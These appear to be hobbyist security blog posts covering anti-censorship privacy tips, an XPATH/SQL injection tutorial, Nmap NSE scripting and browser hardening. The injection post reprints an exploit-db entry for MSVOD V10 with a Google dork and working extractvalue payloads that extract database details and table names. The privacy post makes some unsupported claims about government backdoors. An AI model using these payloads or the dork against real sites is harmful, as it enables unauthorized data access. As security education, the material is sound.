How To Protect Yourself From Corporate Censorship

  • Use Decentralized alternatives.
  • Fire up that VPN
  • Fortify your browser and your devices
  • Utilize Aliases for your own protection

Decentralized alternatives to popular websites on the internet are slowly beginning to pop up and gain prevalence as we are seeing increased prevalence on various media sources. Alternatives to youtube and other social networking sites like DTube exist. Here is an article listing 4 popular decentralized Social media platforms. Entirely decentralized portions of the internet are currently being tested. And of course we obviously have anonymizing darkwebs such as Tor, Freenet and I2P. However I would be an idiot not to note the fact that these platforms have had extreme amounts of trouble gaining any sort of traction with their target audience due to the fact that they lack the addictive simplicity that services like Instagram, Facebook, and Youtube have. Only time will tell if one of these platforms will gain enough popularity to become viable alternatives to what we currently have.

Get a paid VPN. Securing your connection to the internet is of the utmost importance due to the potential for 3rd party eves-droppers and the fact that we really don’t know what information is being given away by our internet service providers.

Utilize TOR or some other encrypted peer to peer darknet like I2P or Freenet. These systems are for the ultra-paranoid, and I don’t really recommend them for the average user who is simply trying to protect themselves  preemptively.

Be careful what you download and get an Antivirus. Utilize www.virustotal.com to see if the file you have downloaded shows up on ANY antivirus. You can also use nodistribute.com if you don’t want your scan results sent to the antivirus companies. Protecting yourself from malware can help prevent your privacy from being invaded by governments or people.

Know your rights. Google around to know what the copyright and internet laws are in your area. Be aware of what the government can and cannot do to you legally.

Utilize secure Open Source software and host your own servers. Offshore servers may sometimes be necessary in the absolute worst cases of censorship. Open Source will ensure that no company will be able to revoke access to the software. The government hates open source because they can’t get their backdoors implanted into the code as easily, although it has potentially happened so be aware.

Note: I am speaking about all this in wake of the recent Mass censoring of Alex Jones and Infowars. Regardless of what your political ideology is, everyone deserves to be able to have their ideas heard. In current times, Corporate Censorship is a new breed altogether. Normally it would be the government, but with big corporate run media platforms anyone can be censored off the platforms if it serves the corporate interest. I’m no anti-capitalist. Quite the contrary, but I do think we need to push the free market in a direction that prevents censorship. Decentralized platforms and Open Source software can help with this. Stay safe.

 

XPATH SQL Injection Using a Recent Example

Xpath Injection

I’m going to show you a recent example of XPATH injection from exploit-db. This is a common method you’ll have to use when the basic Union Select injection doesn’t work and neither does a string injection. Its a bit more tedious because you’ll have to use limit most of the time.

Fixing Injection

Fixing this kind of injection is relatively simple. According to OWASP:

“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”

OWASP logo

Here Is OWASPs’s article on XPATH Injection Vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you’re an aspiring penetration tester, this is important to know as well so you can advise your clients.

Example exploit

# Exploit Title: MSVOD V10 ¡V SQL Injection # Google Dork: inurl:"images/lists?cid=13" # Date: 2018/07/17 # Exploit Author: Hzllaga # Vendor Homepage: http://www.msvod.cc/ # Version: MSVOD V10 # CVE : CVE-2018-14418 #Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/ Payload: /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
You can tell by looking at the payload that this is an XPATH injection because of the simple fact that it is using “extractvalue”.
Here the cid parameter is vulnerable. But if you were to try union based injection it wouldn’t work. There are a few things to try in this scenario, but one of them is extractvalue.
The actual payload would be
/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --
Other than the Union Select being missing there is really no difference in the injection.
However, In some cases with XPATH injection you will be stuck going by single lines which can be very time consuming. You will have to use
Limit 0,1, limit 1,1, limit 2,1, etc
One example payload where you’d have to use this method:
?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Here is a link to a useful tutorial on XPATH injections. The english is a little bad, but if you have any questions don’t hesitate to ask them in the comments. This is only to be used for educational or legal purposes. Keep in mind that I take no responsibility for your actions.
The exploit-db and CVE:

NSE Nmap has Hidden Potential

Nmap is THE go-to tool for network mapping. What you might not know is that it also has an absurd amount of power and flexibility due to the fact that it also functions as a vulnerability scanner and an exploitation framework! Not only that, but it also doubles as a replacement for netcat, aka The hacker’s sswiss army knife. Yep. every recent Nmap installation comes with Ncat, the modernized clone of netcat that supports ssl encryption. Making it the more practical of the two in today’s age of encryption.

Example usage:

$ ncat 192.168.1.100 80

Image result for billy mays

But wait there’s more!

Nmap now has the Nmap Scripting Engine. This gives it way more versatility than ever before. None of this is new news to alot of people I realize, but its a bit impressive if you take a step back and think about the fact that Nmap started off as a simple portscanner.

To use NSE we must first locate where all the scripts are so we can know what we’ve got as well as where to put new scripts that we might code ourselves and also where to put scripts we’ve taken from the internet.

If you’re on linux just type “locate *.nse”

$ locate *.nse
/usr/share/nmap/scripts/acarsd-info.nse
/usr/share/nmap/scripts/address-info.nse
/usr/share/nmap/scripts/afp-brute.nse
/usr/share/nmap/scripts/afp-ls.nse
/usr/share/nmap/scripts/afp-path-vuln.nse
/usr/share/nmap/scripts/afp-serverinfo.nse
/usr/share/nmap/scripts/afp-showmount.nse
/usr/share/nmap/scripts/ajp-auth.nse
/usr/share/nmap/scripts/ajp-brute.nse
/usr/share/nmap/scripts/ajp-headers.nse
/usr/share/nmap/scripts/ajp-methods.nse
/usr/share/nmap/scripts/ajp-request.nse
/usr/share/nmap/scripts/allseeingeye-info.nse
/usr/share/nmap/scripts/amqp-info.nse
/usr/share/nmap/scripts/asn-query.nse
...

Now we know where the scripts are installed, but how do we use it?

$ nmap -sC TargetNameHere

The above command will run the default scripts against a target (url or IP). The following is an example of how to use a specific script against a target.

$ nmap --script smb-check-vulns-nse 192.168.1.1

Now you know the basics, but the trick is to go out and learn how to write your own scripts. I’ll do that in a later tutorial if its asked for, but in the mean time, go and see if you can find some nse scripts written by other people. There is alot that people have accomplished on their own. Thats the beauty of open source. One example of this is nmap vulnerability scan on github (link below) They have a script that connects to several regularly updated vulnerability databases and scans from those. Check the github for usage and installation instructions. This is a powerful tool, so I leave it in your hands. Don’t do anything stupid with it.

https://github.com/scipag/vulscan

How to Fortify your Browser (Chrome/Firefox)

The point of this add-on is to get 3rd party advertisements out of your web browser which will help minimize the parties involved. Next is get NoScript (firefox) or ScriptSafe (chrome). This will allow you to selectively block various client side script features on websites thus making it safer to browse. Now get Self Destructing Cookies (firefox) or Cookie AutoDelete (chrome). These addons will destroy cookies when you close a connection (close a tab) with a website which will prevent them from tracking you. Keep in mind however that they can still track you if you keep the tab open. Another great addon to try for both chrome and firefox is Disconnect. This addon will allow you to block various tracking requests.

The next thing you’ll want to do is utilize incognito mode (for chrome) OR open a new private window (for firefox) Both of these will put you in a browsing mode that won’t keep browsing history, cookies, or any site-specific information like login credentials.

You’ll also want a private paid VPN such as NordVPN. Remember that free VPNs are slow and insecure at best. At worst, they’re selling your information to 3rd parties. Remember: If they’re not selling you something, they’re selling you. 

Finally, for the majority of users I recommend an AntiVirus for obvious reasons. And also I recommend a password manager such as Dashlane . Remembering every single password in this day and age is nearly impossible, so there is a great temptation to get your browser to do it for you. Don’t do this. There is malware specifically coded to steal credentials from the most popular browsers like Internet Explorer, Microsoft Edge, Firefox, Chrome, Safari, Opera, Iceweasel, etc.

That just about wraps it up for basic browser security. There are a few custom modifications you can make to the browser themselves but that goes beyond the scope of this article. If this article recieves enough likes or I get enough requests, I’ll make a tutorial on modifying the most popular browsers for privacy.

Note: Please remember that there is a difference between security, privacy and anonymity. Achieving anonymity online goes beyond the scope of this article.